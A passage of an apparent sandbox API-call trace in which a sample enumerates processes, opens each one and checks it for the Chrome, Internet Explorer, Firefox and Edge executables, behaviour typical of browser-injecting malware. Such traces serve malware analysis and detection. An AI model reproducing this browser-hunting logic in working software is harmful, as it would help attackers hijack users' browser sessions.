	[0202.158] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0202.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2178
	[0202.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.159] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0202.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.159] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.160] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0202.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.160] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.160] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x217c
	[0202.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.161] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.162] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.162] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.162] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.162] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0202.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2180
	[0202.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.163] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0202.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.164] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.164] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0202.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.164] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.164] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0202.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2184
	[0202.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.165] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0202.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.166] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.166] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0202.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.166] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.167] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0202.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2188
	[0202.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.167] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0202.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.168] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.168] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0202.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.168] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.168] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0202.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x218c
	[0202.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.169] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.169] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.170] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.170] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.170] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2190
	[0202.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.171] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.171] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.172] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.172] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.172] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.173] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2194
	[0202.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.173] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.174] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.174] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.174] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.174] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2198
	[0202.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.175] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.176] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.176] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.176] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.176] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.177] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x219c
	[0202.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.177] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.178] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.178] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.178] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.179] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.179] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x21a0
	[0202.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.179] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.180] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.180] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.180] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.181] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x21a4
	[0202.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.181] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.182] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.182] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.182] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.183] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x21a8
	[0202.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.183] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.184] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.184] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.184] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0202.185] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x21ac
	[0202.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.185] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0202.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.186] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.186] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0202.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.187] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.187] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x21b0
	[0202.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.188] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.188] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.188] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.189] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.189] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0202.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x21b4
	[0202.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.190] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.190] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.190] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.191] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.191] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x21b8
	[0202.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.192] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.196] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x21bc
	[0202.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.197] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.197] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.198] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.198] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.198] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0202.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x21c0
	[0202.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.199] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0202.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.199] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.200] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0202.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.200] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.200] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0202.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x21c4
	[0202.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.201] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0202.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.201] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.202] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0202.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.202] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0202.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x21c8
	[0202.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.203] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.203] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.204] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.204] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.204] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0202.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x21cc
	[0202.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.205] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0202.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.205] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.205] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0202.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.206] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.206] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0202.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0202.207] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0202.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x21d0
	[0202.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.208] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0202.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.215] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.216] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0202.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.216] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.217] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0202.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x21d4
	[0202.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.218] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0202.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.218] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.218] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0202.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.219] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.219] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0202.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x21d8
	[0202.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.220] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0202.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
